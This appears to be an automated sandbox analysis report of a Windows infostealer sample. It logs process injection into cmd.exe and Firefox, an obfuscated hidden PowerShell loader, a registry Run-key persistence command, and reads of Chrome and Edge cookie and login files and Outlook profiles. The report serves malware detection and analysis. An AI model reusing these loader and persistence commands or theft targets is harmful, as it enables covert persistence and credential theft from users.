Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: NULL target: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 2640
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Kanels.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Kanels.exe base: 1660000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Kanels.exe base: 19FFF4
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Kanels.exe "C:\Users\user\AppData\Local\Temp\Kanels.exe"
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$delkrederekontoer=get-content 'c:\users\user\appdata\local\temp\sammentrkkenes\petrochemical\pakken\abstinerende\sensorernes\belgier\vildnisernes.tom61';$rabarberkompots=$delkrederekontoer.substring(42536,3);.$rabarberkompots($delkrederekontoer)"
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "slavocracy" /t reg_expand_sz /d "%sciurids% -windowstyle minimized $miscomfort=(get-itemproperty -path 'hkcu:\massakrerede\').apodyteria;%sciurids% ($miscomfort)"
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_1000111A GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree, 0_2_1000111A
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403373

Stealing of Sensitive Information

Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY